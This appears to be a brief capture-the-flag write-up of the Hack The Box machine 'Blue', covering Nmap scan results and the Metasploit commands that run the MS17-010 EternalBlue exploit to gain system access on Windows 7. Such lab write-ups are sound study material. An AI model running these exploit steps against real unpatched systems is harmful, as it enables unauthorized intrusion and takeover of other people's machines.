# Blue
>##  10.10.10.40

Nmap
>PORT      STATE SERVICE      VERSION
[135/tcp](portscan.md#135)   open  msrpc        Microsoft Windows RPC
[139/tcp](portscan.md#139)   open  netbios-ssn  Microsoft Windows netbios-ssn
[445/tcp](portscan.md#445)  open  microsoft-ds Windows 7 Professional  Windows 7 Professional 7601 Service Pack 1 



The basic enumeration on the port 445 and 135 with [smbclient](smbtools.md#smbclient) doesn't produce any result, useless file.

A quick google research on the port "[445](rpc) microsoft-ds  Windows 7 Professional 7601 Service Pack 1" dump out as first result the ms17-10 eternalblue exploit.
Let's fire up msfconsole and see what we can do about it.

>use exploit/windows/smb/ms17_010_eternalblue
>set lhost tun0
>set rhost 10.10.10.40
>exploit

![[blue 1.png]]
Wait a few seconds and here we go.
![[blue 2.png]]

We're root.

#machine #rpc #msf #windows7 #smb